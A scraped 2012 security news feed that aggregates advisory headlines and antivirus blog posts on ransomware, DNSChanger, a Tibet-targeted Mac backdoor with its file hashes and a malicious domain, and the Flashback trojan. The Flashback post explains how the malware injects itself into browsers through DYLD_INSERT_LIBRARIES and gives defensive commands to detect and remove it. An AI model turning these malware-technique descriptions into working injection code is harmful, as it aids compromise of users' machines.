Channel Image14:56 Gaim-Encryption Plugin / new / 14th Apr / (Other)» Security BugWare
Gaim-Encryption Plugin heap corruption
Channel Image14:56 Found Object: SpyEye Manual» F-Secure Antivirus Research Weblog
File this in the "we shouldn't be surprised" folder.

This morning, one of our analysts, currently researching SpyEye, came across a new component name. And so, he did a Google search for that component.

He found… a copy of the SpyEye Manual:

SpyEye Manual

Not exactly what he expected to find…

But then, it really isn't really that surprising (sadly) to just find such stuff laying around on the Web.

On 12/03/12 At 03:40 PM

Channel Image14:56 Fondation Eclipse : Indigo, une livraison annuelle marquée par Java» Actualités Open Source
Chaque année, la Fondation Eclipse met à la disposition des développeurs le fruit de ses travaux. Hier, elle a livré son stock 2011 de technologies destinées (...)


Channel Image14:56 Flash Player security update» SUSE Security Announcements
18 Apr 2011
Channel Image14:56 Flash Player security problems» SUSE Security Announcements
19 May 2011
Channel Image14:56 Firefox drops support for Windows 2000, XP RTM, XP SP1» OSNews
Still holding on to Windows 2000, XP RTM or XP SP1? No more Firefox for you, my friend - Mozilla has just upped its minimum supported Windows version to Windows XP SP2. In addition, support for Firefox 3.6 will end April 24. Asa Dotzler presents Opera as an alternative for you crazy people still on Windows 2000, XP RTM or XP SP1.
Channel Image14:56 FipsGuestbook / new / 16th Apr / (Other)» Security BugWare
FipsGuestbook script injection
Channel Image14:56 Finns Targeted By Localized Ransomware» F-Secure Antivirus Research Weblog
Over the past few days we've received reports of Finns being targeted by ransomware which is localized in Finnish language and claims to be from Finnish police.

The Ransomware in question is part of a family we call Trojan:W32/Ransom and is localized to several European countries: Germany; UK; Spain; and now Finland. In all countries, the social engineering method is the same. Upon infection, the Ransomware expands Internet Explorer to full screen (F11) and displays a message claiming to be from a local police unit claiming that the user's computer has been used in browsing sites containing child and animal abuse. It also claims that it has been used to send e-mail spam on topics related to terrorism, and has thus been locked until a fine is paid.

kuvakaappaus
Image: Poliisi

In this case, the Ransomware claims to be from "Tietoverkkorikosten tutkinnan yksikkö" which translates as information networks crime unit. However, the Finnish police doesn't have a unit with that exact name. Also to be noted is that the quality of Finnish is not very good and the contact address is to cyber-metropolitan-police.co.uk. Further inspection reveals that the cyber-metropolitan-police.co.uk domain is registered to a fake person Mr. “be happy” residing in Gette, Poland. Very credible indeed.

The Finnish ransom message is demanding payment using Paysafecard, which is a disposable prepaid card that can be used for anonymous online transactions. It is sold nationally at kiosks within Finland.

F-Secure Internet Security detects known variants of Trojan:W32/Ransom either by family name or generic detection names, but as always it pays to be careful. Our back end statistic indicate that this is definitely "liikkeellä" (in-the-wild).

The initial infection vector for this trojan has been either a Java runtime exploit or Adobe Acrobat PDF reader exploit, there is no information about fresh (0-day) exploits being used.

So to be safe:

1. Update your Acrobat PDF reader to the latest version, or switch to another PDF reader.
2. Update your Java runtime. Or, if you do not need Java, it is highly advisable to uninstall it. If you do need Java, at least consider disabling it within the browser when not in use. Or, switch to Google Chrome which will ask before Java is executed from unknown sites.

If your computer is ever compromised by Ransomware, do not pay anything to the malware authors. In almost all of the cases paying does not free up your computer anyway. Also remember that neither the Finnish police nor any other Police in the world uses Paysafe, Ucash or any other prepaid billing systems for fines. If any message is demanding your credit card or any other payment method it is most certainly a scam and not legitimate government official.

Links:

  •  Finnish Police advisory, 08.03.2012
  •  Finnish Police advisory, 09.03.2012
  •  Cert-FI advisory

On 09/03/12 At 01:26 PM

Channel Image14:56 FileMaker Pro / new / 14th Apr / (Other)» Security BugWare
FileMaker Pro remote password retrieval
Channel Image14:56 Ez Publish / new / 16th Apr / (Other)» Security BugWare
Ez publish info & path disclosure and XSS
Channel Image14:56 Encrypted Storm Sigs» Bleeding Edge Threats
As you all know there’s been a variant of Storm that’s XOR encrypting it’s P2P traffic. I didn’t put up sigs for this one specifically as we expected it to change and we’d see a flood of differently encrypting variants. All I could put up was a few sigs looking for UDP packets of certain [...]
Channel Image14:56 E-Jihad Tool Sigs» Bleeding Edge Threats
Sent in by Don Jackson from SecureWorks. Good set of sigs. The tool isn’t all that well written, there are existing toolkits and code that are much better suited, but this is what we’re seeing. No significant activity, but it’s in the press… Current signatures available here: http://www.bleedingthreats.net/cgi-bin/viewcvs.cgi/sigs/CURRENT_EVENTS/CURRENT_E-Jihad?view=markup Please report any issues. matt
Channel Image14:56 Dustin Webber Creates Network Security Monitoring with Siri» TaoSecurity
Dustin Webber just posted a really cool video called Network Security Monitoring with Siri. He shows how he uses his iPhone 4S and SiriProxy to interact with his Snorby Network Security Monitoring platform.

The following screenshot shows Dustin asking "Can you show me what the last severity medium event was?" and Siri answering.



Later he asks Siri to tell him about "incident 15":



Near the end Dustin asks Siri if she likes Network Security Monitoring:



This is just about the coolest thing I've seen all year. Ten years ago I thought it was cool to listen to Festival read Sguil events out loud -- now Dustin shows how to interact with a NSM platform by voice command. Amazing!

Channel Image14:56 Dr Jose Nazario on CNet» Bleeding Edge Threats
Great interview about botnets and Storm in general on CNet with Jose Nazario from Arbor Networks. Jose’s a log time friend and contributor to Bleeding Edge Threats. Well done interview Jose. It was a surprise to hear your voice on my iPod on the way to the train station this morning… but welcome nonetheless. The interview [...]
Channel Image14:56 DirectoryService / new / 14th Apr / (MacOS)» Security BugWare
DirectoryService privilege escalation and DoS attack
Channel Image14:56 Dell acquiert sa brique réseau avec Force10 Networks» Actualités Réseaux
Au regard des différents concurrents, Dell se devait d'acquérir une compétence dans la partie réseau pour proposer une offre complète pour les solutions (...)
Channel Image14:56 DSA-2296 iceweasel» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2295 iceape» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2294 freetype» Debian Security
missing input sanisiting
Channel Image14:56 DSA-2293 libxfont» Debian Security
buffer overflow
Channel Image14:56 DSA-2292 isc-dhcp» Debian Security
denial of service
Channel Image14:56 DSA-2291 squirrelmail» Debian Security
various vulnerabilities
Channel Image14:56 DSA-2290 samba» Debian Security
cross-site scripting
Channel Image14:56 DSA-2289 typo3-src» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2288 libsndfile» Debian Security
integer overflow
Channel Image14:56 DSA-2287 libpng» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2286 phpmyadmin» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2285 mapserver» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2284 opensaml2» Debian Security
implementation error
Channel Image14:56 DSA-2283 krb5-appl» Debian Security
programming error
Channel Image14:56 DSA-2282 qemu-kvm» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2281 opie» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2280 libvirt» Debian Security
several vulnerabilities
Channel Image14:56 DSA-2279 libapache2-mod-authnz-external» Debian Security
SQL injection
Channel Image14:56 Countdown to March 8th» F-Secure Antivirus Research Weblog
This is the week! (No… that's not an "iPad 3" reference.)

Back in November, the F.B.I. shutdown servers belonging to the DNSChanger botnet, operated by Rove Digital, which was based in Estonia. The Feds have been running substitute DNS servers since then, but their authority to do so expires on March 8, 2012.

And that means tens of thousands of compromised machines may be cut off from Internet services on Thursday.

Based on research by Merike Kaeo, it could even be hundreds of thousands.

DNS Changer Infections
DNS Changer NANOG54 Slides

Internet Service Providers in many countries have been working to reach affected customers for weeks, but there are still plenty that haven't yet heeded the call.

Don't be caught out, more information is available from these DNS configuration test pages:

  •  dns-ok.ax
  •  dns-ok.be
  •  dns-ok.ca
  •  dns-ok.de
  •  dns-ok.fi
  •  dns-ok.fr
  •  dns-ok.lu
  •  dns-ok.us

Update: Added some additional sites, courtesy of CERT-LEXSI.

Update: The U.S. District Court, Southern District of New York has granted the F.B.I. permission to host its substitute DNS servers for an additional 120 days — July 9th is the new deadline.

DNS Changer, July 9th

Update: Added dns-ok.ca to the list above. O Canada!

On 05/03/12 At 07:40 PM

Channel Image14:56 CloudSwing permet d'assembler des composants cloud Open Source» Actualités Open Source
Avec CloudSwing, les développeurs et les départements informatiques des entreprises auront bientôt à leur disposition une autre option pour proposer du (...)


Channel Image14:56 China Targets Macs Used by NGOs #Tibet» F-Secure Antivirus Research Weblog
A new Mac backdoor exploiting CVE-2011-3544 (a Java vulnerability) is being reported. The backdoor appears to be connected to GhostNet. The malware is being used in targeted attacks against non-governmental organizations (NGO).

Greg Walton published details of targeted mails sent to NGOs related to Tibet. The message contains a link to: dns.assyra.com. Read more from Walton here. AlienVault Labs has posted a technical report.

Based on today's news, Brod, one of our Mac malware analysts, remembered this post by Microsoft: Backdoor Olyx – is it malware on a mission for Mac? The post is about a similarly themed attack targeting both Mac and Windows users last July.

We detect these new threats as:

Exploit:Java/CVE-2011-3544.E — MD5: 6C8F0C055431808C1DF746F9D4BB8CB5, MD5: 453A3DC32E2FAFD39F837A1EBE62CA80
Backdoor:OSX/Olyx.B — MD5: 39084b60790ca3fdebe1cd93a4764819
Backdoor:W32/Poison.CE — MD5: 7F7CBC62C56AEC9CB351B6C1B1926265

See yesterday's Mac related post for Java mitigation tips.






On 20/03/12 At 03:20 PM

Channel Image14:56 CERTA-2012-AVI-168 : Vulnérabilité dans CA ARCserv Backup (22 mars 2012)» Les derniers documents du CERTA.
Un attaquant peut réaliser un déni de service à distance sur CA ARCServ Backup.
Channel Image14:56 CERTA-2012-AVI-167 : Vulnérabilités dans GnuTLS (22 mars 2012)» Les derniers documents du CERTA.
Deux vulnérablités permettant à un attaquant distant de réaliser un déni de service à distance ont été corrigées dans GnuTLS.
Channel Image14:56 CERTA-2012-AVI-166 : Multiples vulnérabilités dans Novell ZENworks (22 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités ont été corrigées dans ZENworks Configuration Management. L'exploitation de ces vulnérabilités pouvait conduire à une prise de contrôle à distance du système.
Channel Image14:56 CERTA-2012-AVI-165 : Multiples vulnérabilités dans Citrix XenServer (22 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités ont été corrigées dans Citrix XenServer vSwitch Controller.
Channel Image14:56 CERTA-2012-AVI-164 : Vulnérabilité dans Libpng (22 mars 2012)» Les derniers documents du CERTA.
Une vulnérabilité a été corrigée dans les produits Red Hat. L'exploitation de cette vulnérabilité pouvait conduire à une prise de contrôle à distance.
Channel Image14:56 CERTA-2012-AVI-163 : Multiples vulnérabilités dans Moodle (22 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités dans Moodle permettent de contourner la politique de sécurité et d'accéder à des informations théoriquement protégées.
Channel Image14:56 CERTA-2012-AVI-162 : Multiples vulnérabilités dans RSA enVision (21 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités ont été corrigées dans RSA enVision. L'exploitation de ces vulnérabilités pouvait conduire à une prise de contrôle du serveur à distance.
Channel Image14:56 CERTA-2012-AVI-161 : Vulnérabilité dans Nginx (21 mars 2012)» Les derniers documents du CERTA.
Une vulnérabilité a été corrigée dans Nginx. L'exploitation de cette vulnérabilité pouvait conduire à des fuites d'informations côté serveur.
Channel Image14:56 CERTA-2012-AVI-160 : Vulnérabilité dans JBoss (21 mars 2012)» Les derniers documents du CERTA.
Une vulnérabilité a été corrigée dans JBoss Operations Network. L'exploitation de cette vulnérabilité pouvait conduire à une usurpation d'identité.
Channel Image14:56 CERTA-2012-AVI-159 : Multiples vulnérabilités dans Dell PowerVaul ML6000 (21 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités ont été corrigées dans le produit Dell PowerVaul ML6000. L'exploitation de ces vulnérabilités pouvait conduire à une prise de contrôle du serveur.
Channel Image14:56 CERTA-2012-AVI-158 : Vulnérabilités dans Aruba Networks (20 mars 2012)» Les derniers documents du CERTA.
Deux vulnérabilités ont été corrigées dans ArubaOS. L'exploitation de ces vulnérabilités pouvait conduire à une prise de contrôle totale sur le système distant.
Channel Image14:56 CERTA-2012-AVI-157 : Multiples vulnérabilités dans VLC (20 mars 2012)» Les derniers documents du CERTA.
Deux vulnérabilités ont été corrigées dans VLC. Elles permettent à un attaquant d'exécuter du code arbitraire au moyen d'un fichier média spécialement conçu.
Channel Image14:56 CERTA-2012-AVI-156 : Multiples vulnérabilités dans IBM HTTP Server (20 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités ont été corrigées dans les produits IBM HTTP Server. L'exploitation de ces vulnérabilités pouvait conduire à une interruption du service HTTP.
Channel Image14:56 CERTA-2012-AVI-155 : Multiples vulnérabilités dans Citrix Licensing Administration Console (19 mars 2012)» Les derniers documents du CERTA.
Plusieurs vulnérabilités non spécifiées par l'éditeur ont été corrigées dans Citrix Licensing Administration Console.
Channel Image14:56 CERTA-2012-AVI-154 : Vulnérabilité dans IBM Tivoli Endpoint Manager (19 mars 2012)» Les derniers documents du CERTA.
Une vulnérabilité dans IBM Tivoli Endpoint Manager permet à un attaquant de réaliser de l'injection de code indirecte à distance.
Channel Image14:56 CERTA-2012-AVI-153 : Vulnérabilités dans Asterisk (19 mars 2012)» Les derniers documents du CERTA.
Deux vulnérabilités ont été corrigées dans Asterisk. L'une d'entre elles permet l'exécution de code arbitraire à distance.
Channel Image14:56 CERTA-2012-AVI-152 : Vulnérabilités dans Joomla! (19 mars 2012)» Les derniers documents du CERTA.
Deux vulnérabilités ont été corrigées dans Joomla!.
Channel Image14:56 CERTA-2012-AVI-151 : Multiples vulnérabilités dans VMware (19 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités ont été corrigées dans les produits VMware, dont l'exploitation permet jusqu'à l'exécution de code arbitraire à distance.
Channel Image14:56 CERTA-2012-AVI-150 : Vulnérabilités dans Cisco ASA et ASASM (16 mars 2012)» Les derniers documents du CERTA.
Plusieurs vulnérabilités dans des produits Cisco permettent à un attaquant de provoquer un déni de service à distance.
Channel Image14:56 CERTA-2012-AVI-149 : Vulnérabilité dans Cisco Catalyst 6500 et 5500 (16 mars 2012)» Les derniers documents du CERTA.
Une vulnérabilité dans des produits Cisco permet à un attaquant de provoquer un déni de service à distance.
Channel Image14:56 CERTA-2012-AVI-148 : Multiples vulnérabilités dans les équipements XEROX (16 mars 2012)» Les derniers documents du CERTA.
Deux vulnérabilités ont été corrigées dans les équipements XEROX, qui permettent l'exécution de code arbitraire à distance.
Channel Image14:56 CERTA-2012-AVI-147 : Vulnérabilité dans OpenLDAP (16 mars 2012)» Les derniers documents du CERTA.
Une vulnérabilité a été corrigée dans OpenLDAP, qui permet de réaliser un déni de service à distance.
Channel Image14:56 CERTA-2012-AVI-146 : Multiples vulnérabilités dans HP Data Protector Express (15 mars 2012)» Les derniers documents du CERTA.
De multiples vulnérabilités ont été corrigées dans HP Data Protector Express, qui peuvent être exploitées pour exécuter du code arbitraire à distance.
Channel Image14:56 CERTA-2012-ACT-012 : Bulletin d'actualité numéro 012 de l'année 2012 (23 mars 2012)» Les derniers documents du CERTA.
CERTA-2012-ACT-012
Channel Image14:56 CERTA-2012-ACT-011 : Bulletin d'actualité numéro 011 de l'année 2012 (16 mars 2012)» Les derniers documents du CERTA.
CERTA-2012-ACT-011
Channel Image14:56 Boston IT : A la rencontre des entreprises innovantes dans le Massachusetts» Actualités Réseaux
Après nos rencontres IT en Floride et dans la Silicon Valley, nous sommes de retour aux États-Unis, mais dans la région de Boston pour visiter de nouveau (...)
Channel Image14:56 Best Book Bejtlich Read in 2011» TaoSecurity
It's time to name the winner of the Best Book Bejtlich Read award for 2011!

I've been reading and reviewing digital security books seriously since 2000. This is the 6th time I've formally announced a winner; see my bestbook label for previous winners.

Compared to 2010 (31 books), 2011 saw a decrease to 22 books. Remember all reading is neither equal nor fast. When I review a book, I am sure to read it and not just skim it. For 10 books last year, I chose not to read them but to instead post impressions. Posts called "impressions" provide my sense of the book but I do not publish them in my Amazon.com reviews.

My ratings for 2011 can be summarized as follows:

  • 5 stars: 10 books

  • 4 stars: 7 books

  • 3 stars: 4 books

  • 2 stars: 1 book

  • 1 stars: 0 books

Please remember that I try to avoid reading bad books. If I read a book and I give it a lower rating (generally 3 or less stars), it's because I had higher hopes.

Here's my overall ranking of the five star reviews; this means all of the following are excellent books. The links point to my reviews.And, the winner of the Best Book Bejtlich Read in 2011 award is...

  • Hacking: The Art of Exploitation, 2nd Ed by Jon Erickson; No Starch. My review said in part:

    Jon Erickson's Hacking, 2nd Ed (H2E) is one of the most remarkable books in the group I just read. H2E is in some senses amazing because the author takes the reader on a journey through programming, exploitation, shellcode, and so forth, yet helps the reader climb each mountain. While the material is sufficiently technical to scare some readers away, those that remain will definitely learn more about the craft.

Looking at publishers, for the first year I can remember no publisher won more than one title. No Starch breaks the string of 3 straight previous BBBR victories held by Syngress.

Thank you to all publishers who sent me books in 2011. I have plenty more to read in 2012.

Congratulations to all the authors who wrote great books in 2011, and who are publishing titles in 2012!

Channel Image14:56 Bejtlich's Take on RSA 2012» TaoSecurity
Last week I attended RSA 2012 in San Francisco. I believe it was my third RSA conference; I noted on my TaoSecurity News page speaking at RSA in 2011 and 2006.

This year I spoke at the Executive Security Action Forum on a panel moderated by PayPal CISO Michael Barrett alongside iDefense GM Rick Howard and Lockheed Martin CISO Chandra McMahon. I thought our panel offered value to the audience, as did much of the remainder of the event.

Most of the speakers and attendees (about 100 people) appeared to have accepted the message that prevention eventually fails and that modern security is more like a counterintelligence operation than an IT operation.

After ESAF (all day Monday) I divided my time among the following: speaking to visitors to the Mandiant booth, discussing security issues with reporters and industry analysts, and walking the RSA exposition floor. I also attended the Wednesday panel where one of our VPs, Grady Summers, explained how to deal with hacktivists.

Speaking of the RSA floor, I took the photo at left praising the 55 new vendors appearing at the exposition for the first time. I counted 13 I recognized as "established" companies or organizations (Airwatch, CyberMaryland, Diebold, FireHost, Fluke Networks, Global Knowledge, GoDaddy.com, Good Technology, Nexcom, PhishMe, Prolexic Technologies, Qosmos, and West Coast Labs). I didn't recognize the other 42. There were probably dozens more who were not first-time RSA vendors that I wouldn't recognize either.

I suppose there are different ways to think about this situation. A positive way would be to view these new companies as signs of innovation. However, I didn't really see much that struck me as new or innovative. For example, a company specializing in password resets doesn't really get the heart pumping.

Another point of view could be that the presence of so many new companies means venture capital is active again. I saw plenty of that at work for certain companies who I know have just rebranded, relaunched, or have been resuscitated in recent months. Several of them sported mammoth booths and plenty else. They must figure that if they have 7 or 8 figures to spend, they're going to put it into marketing!

I was in some ways overwhelmed by the number of attendees. I saw references to over 20,000 people attending RSA 2012. I believe many of them wore $100 (or even free, courtesy of vendors) "expo only" passes. With 20,000 people willing to participate in a security event, that tells me my @taosecurity Twitter follower count (over 11,000 today) has more room to grow. I would not have expected to rise much beyond 10,000 when I started Tweeting.

One of the best aspects of RSA 2012 was the Security Bloggers Meetup, which I was able to attend in person as I blogged previously.

My buzzphrase of the conference was "big data." To me, "big data" sounds like SIEM warmed over. I'll have more to say on this topic in future posts.

I'll probably return to RSA next year on behalf of my company, and again I will focus on the exposition and non-session activities. It's the only place where you can see so many security vendors in one place.

What did you think of RSA this year?

Channel Image14:56 Become a Hunter» TaoSecurity
Earlier this year SearchSecurity and TechTarget published a July-August 2011 issue (.pdf) with a focus on targeted threats. Prior to joining Mandiant as CSO I wrote an article for that issue called "Become a Hunter":

IT’S NATURAL FOR members of a technology-centric industry to see technology as the solution to security problems. In a field dominated by engineers, one can often perceive engineering methods as the answer to threats that try to steal, manipulate, or degrade information resources. Unfortunately, threats do not behave like forces of nature. No equation can govern a threat’s behavior, and threats routinely innovate in order to evade and disrupt defensive measures.

Security and IT managers are slowly realizing that technology-centric defense is too easily defeated by threats of all types. Some modern defensive tools and techniques are effective against a subset of threats, but security pros in the trenches consider
the “self-defending network” concept to be marketing at best and counter-productive at worst. If technology and engineering aren’t the answer to security’s woes, then what is?


Download and read my article starting on page 19 for the answer! July-August 2011 issue (.pdf)
Channel Image14:56 Are you having a (Mac) Flashback?» F-Secure Antivirus Research Weblog
On Monday, I provided steps on how to avoid your Mac being compromised by the Flashback trojan. Today I will provide information on how to locate a Flashback infection.

To better understand the steps below, it is better to also know a bit about Flashback. It's an OS X malware family that modifies the content displayed by web browsers. To achieve this, it interposes functions used by the Mac's browsers. The hijacked functions vary between variants but generally include CFReadStreamRead and CFWriteStreamWrite:



The webpages that are targeted and changes made are determined based on configurations retrieved from a remote server. The following is an example of configuration data:



When decoded, you can see the targeted webpage (in red) and the injected contents (in yellow):



This ability more or less makes it some sort of a backdoor. Because of this, and the fact that the malware initially relied on tricking users by pretending to be a Flash Player installer, it was dubbed Flashback. It has however evolved since then and has started incorporating exploits to spread in recent variants. In all the cases that I've seen, they at least target Google which causes me to believe that it is actually the next evolution of Mac QHost.

With its interposing function in place, the next thing Flashback does is to get the browser(s) to load it.

This is where the DYLD_INSERT_LIBRARIES environment variable comes in handy:



There are generally two types of infections. The first one occurs when the malware has admin privileges. An example would be the 2nd variant, Flashback.B, or the screenshot above. In this type of infection, the DYLD_INSERT_LIBRARIES environment variable is added to the context of the targeted applications only, specifically the browsers. Earlier variants target Safari and Firefox. Recent variants only target Safari. This type of infection can be more difficult for a user to notice because the infected system will be more stable.

The second type of infection occurs when the malware does not have admin privileges. An example would be the first variant, Flashback.A. In this type of infection, the DYLD_INSERT_LIBRARIES environment variable is added to the context of the infected user. This means that the malware will be loaded to all applications launched by the infected user. This makes the infected system much more unstable because there will be more crashes caused by incompatible applications. To solve this, recent variants have introduced a new filter component:



In the example above, the filter component only loads the main component when the process is Safari (ignore "WebPo" from the screenshot; it's probably just a typo by the malware author for WebProcess, which is part if Safari).

So how to locate an infection in this case? The simplest way is to check the DYLD_INSERT_LIBRARIES environment variable of our browsers. You can use the following command in Terminal:

  •  defaults read /Applications/%browser%.app/Contents/Info LSEnvironment



In the example above, it means your Firefox is clean. If you are infected, you will see something similar to this:



Take note of the value of DYLD_INSERT_LIBRARIES as shown in the red box. We need that to locate the main component in case it is just the filter component:

  •  grep -a -o '__ldpath__[ -~]*' %path_from_previous_step%



Take note of the files pointed out in the red boxes as they are the Flashback files. I believe most users won't have a DYLD_INSERT_LIBRARIES environment variable.

If you didn't get any result from grep, it means that the variant in your system doesn't have the filter component.

The next thing that you may also want to check is the DYLD_INSERT_LIBRARIES environment variable of your users in case they have the second type of infection:

  •  defaults read ~/.MacOSX/environment DYLD_INSERT_LIBRARIES



If you don't get any results, it means you don't have this type of infection.

You can use the following command again to locate the main component if you have the filter component:

  •  grep -a -o ' __ldpath__[ -~]*' %path_from_previous_step%



Now what to do with the samples? Send them to us. By sending us the sample, you will be helping the community as well since we have sample sharing arrangements with other AV vendors.

When deleting the samples from a system, you have to make sure you remove the DYLD_INSERT_LIBRARIES environment variable as well. Otherwise your browsers or even worse your whole account may refuse to load next time.

Use the following for the first type of infection:

  •  sudo defaults delete /Applications/%browser%.app/Contents/Info LSEnvironment
  •  sudo chmod 644 /Applications/%browser%.app/Contents/Info.plist



Use the following for the second type of infection:

  •  defaults delete ~/.MacOSX/environment DYLD_INSERT_LIBRARIES
  •  launchctl unsetenv DYLD_INSERT_LIBRARIES



You can visit our Trojan-Downloader:OSX/Flashback.I description for additional details about a more recent Flashback variant.

Regards,
Brod

On 23/03/12 At 12:52 PM

Channel Image14:56 Annuels Cisco : les ventes progressent légèrement mais le bénéfice chute» Actualités Réseaux
Cisco publie des résultats annuels satisfaisants alors que l'annonce récente d'une réduction de 15% des effectifs mondiaux pouvait faire craindre le pire. (...)
Channel Image14:56 Android Ice Cream Sandwich alpha released for Nokia N9» OSNews
Are you one of those lucky bastards who own a Nokia N9, yet are suffering from the mother of all first world problems - beautiful smartphone, but want a different operating system? Your prayers have been heard: an alpha release of Android 4.0.3 for the N9. Here's a video, and here's the instructions on how to get it working.
Channel Image14:56 Alcatel-Lucent étudie toujours la cession de son activité PBX» Actualités Réseaux
Le mercredi 20 juillet, Alcatel-Lucent a confirmé étudier des options stratégiques concernant son activité Entreprise, ce qui comprend la cession de l'activité (...)
Channel Image14:56 After outrage, BioWare considers changing Mass Effect 3 ending» OSNews
As I made very clear in my thorough review of Mass Effect 2, I'm a huge BioWare fan. This relationship got very, very cloudy when BioWare released Dragon Age II, a rush job with no story and atrocious gameplay. Mass Effect 3 looked like redemption - until I hit the terrible, terrible ending. The criticism of the ending has been so immense and consistent, BioWare is contemplating changing it. Of course, this story is riddled with spoilers, so be warned.
Channel Image14:56 Adobe Photoshop CS6 hands-on preview» OSNews
"Adobe has been dropping preview links to its upcoming version of Photoshop CS6 for months now, even hyping it up with a Rainn Wilson cameo at MAX 2011. Photoshop CS6 marks one of the app's most drastic visual changes, with a darker visual redesign and streamlined toolbars, and it has all sorts of changes to cursors, filters, video editing, and more in tow. We got some quick hands on time with the app, so read on for our take on Adobe's next-gen installation of Photoshop."
Channel Image14:56 Adobe Flash Player security problems» SUSE Security Announcements
05 Nov 2010
Channel Image14:56 Adobe Acrobat Reader» SUSE Security Announcements
07 Mar 2011
Channel Image14:56 Adam O'Donnell: The Scale of Security» SecurityFocus News
The Scale of Security
Channel Image14:56 ActivCard / new / 16th Apr / (Other)» Security BugWare
ActivCard password cache memory leakage
Channel Image14:56 Acrobat Reader security update» SUSE Security Announcements
11 Oct 2010
Channel Image14:56 Acrobat Reader security issues» SUSE Security Announcements
09 Dec 2010
Channel Image14:56 AV-TEST Results for Android Malware Protection» F-Secure Antivirus Research Weblog
AV-TEST published its "Anti-Malware solutions for Android" report today.

Out of 41 products tested — we're proud to be in the top tier!

AV-TEST, Android 2012-02

Because AV-TEST is still in the process of refining its test methodologies, it hasn't announced direct rankings.

But if you download their detailed report, available from www.av-test.org/en/tests/android, you'll see in Figure 5. that only one other vendor matched our detection rates for all of the families tested.

And if you find AV-TEST's report to be of interest, we remind you that you can also download our Mobile Threat Report, Q4 2011.

Cheers!

Update: If you'd like to try mobile security, visit: mobile.f-secure.com.

On 06/03/12 At 01:50 PM

Channel Image14:56 'Screenshots of despair'» OSNews
Absolutely terrifying and very depressing screenshots from all kinds of software. "Screenshots of despair". Chilling stuff.
Channel Image14:56 Newsletter HSC N°91» Nouveautes HSC
Channel Image14:56 Newsletter HSC N°90» Nouveautes HSC
Channel Image14:56 » CERT/CC
Information previously published in CERT advisories, incident notes, and summaries is now incorporated into various US-CERT products. RSS channels for US-CERT products can be obtained from the US-CERT web site.
Channel Image14:56 Newsletter HSC N°89» Nouveautes HSC
Channel Image14:56 Newsletter HSC N°88» Nouveautes HSC
Channel Image14:56 Newsletter HSC N°87» Nouveautes HSC
Channel Image14:56 Communiqué de presse» Nouveautes HSC

Mon 26 March, 2012

Channel Image14:17 La page se tourne définitivement pour Alapage» ZDNet News
Le site de commerce en ligne lancé en 1996 et racheté en 2009 par RueduCommerce baisse le rideau.
Channel Image13:46 MOG gets friendly with Windows, offers up the MOG app for Windows» GadgeTell
If you happen to be a MOG user that uses a Windows computer, you may be happy to learn that you know have a native app available for download. Yup, the folks over at MOG have released the MOG app for Windows. The app is free to download, however you will need to be a more »
Channel Image12:35 Terrorisme : le CNNum se propose d'étudier le projet de Nicolas Sarkozy» 01net. Actualités
Le CNNum a envoyé une lettre ouverte au Président afin de l'alerter sur les risques d'une loi pénalisant la consultation de sites « terroristes ».


Channel Image11:42 Bond du nombre de plaintes reçues à la Cnil en 2011» ZDNet News
La Commission nationale Informatique et Libertés a reçu 6000 plaintes l'an passé, contre la moitié en 2009.
Channel Image11:19 Facebook s'oppose aux recruteurs qui exigent les mots de passe» 01net. Actualités
Le réseau social n'est pas content de voir que certains recruteurs exigent les mots de passe d'utilisateurs. Et explique que cette pratique est contraire à ses règles.


Channel Image11:15 TélécityGroup : responsables datacenter, « des profils qui sont arrivés là par promotion interne »» ZDNet News
Patron de l’hébergeur français TélécityGroup, Stéphane Duproz recrute et encadre, en tant qu’employeur, des responsables de datacenter. Avis d’un patron sur la fonction et le profil de ces professionnels IT.
Channel Image10:56 Le départ de Franck Esser, patron de SFR, est évoqué» 01net. Actualités
EN BREF. La perte de 200 000 abonnés SFR pourrait coûter sa place à Franck Esser, PDG de SFR.


Channel Image10:50 iPhone 5 : Foxconn recrute 20000 personnes» 01net. Actualités


Channel Image10:29 Orange menace de dénoncer son accord avec Free» 01net. Actualités
Orange ouvre un nouveau chapitre dans le lancement des forfaits Free Mobile en menaçant de dénoncer les contrats avec Free. Simple coup de pression ?


Channel Image09:56 Chrome : une extension malveillante pour pirater des comptes Facebook» ZDNet News
Une fausse extension Flash pour Chrome permet à des pirates de prendre le contrôle de profils Facebook. Seuls les utilisateurs brésiliens et portugais sont cependant concernés.
Channel Image09:50 Open source anti-theft solution for Mac, PCs & Phones – Prey» Popular security Bookmarks on Delicious
Channel Image09:50 Downloads | SecManiac.com» Popular security Bookmarks on Delicious
Channel Image09:47 Ettercap (computing) - Wikipedia, the free encyclopedia» Popular security Bookmarks on Delicious
Channel Image09:43 Packet analyzer - Wikipedia, the free encyclopedia» Popular security Bookmarks on Delicious
Channel Image09:43 Hacking Application for Android | Ethical Hacking-Your Way To The World Of IT Security» Popular security Bookmarks on Delicious
Channel Image09:39 How to capture network traffic with Network Monitor» Popular security Bookmarks on Delicious
Channel Image09:38 Website Security Check - Unmask Parasites» Popular security Bookmarks on Delicious
Channel Image09:37 LastPass - Password Manager, Form Filler, Password Management» Popular security Bookmarks on Delicious
Channel Image09:37 Sucuri - Monitor & Scanner dashboard» Popular security Bookmarks on Delicious
Channel Image09:37 fwknop: Single Packet Authorization and Port Knocking» Popular security Bookmarks on Delicious
Channel Image09:28 Yahoo : bataille au sommet pour une nouvelle stratégie» ZDNet News
Pour peser sur la stratégie du groupe, l’actionnaire et dirigeant d’un hedge fund, Daniel Loeb, préconisait la nomination de quatre nouveaux membres du comité d’administration, dont lui-même. La direction ne l’a pas suivi et a opté pour trois autres membres choisis par elle.
Channel Image08:55 Microsoft bloque les liens Pirate Bay dans Windows Live Messenger» ZDNet News
Désormais, tous les liens pointant vers le site BitTorrent sont bloqués au motif qu’ils posent un risque de sécurité.
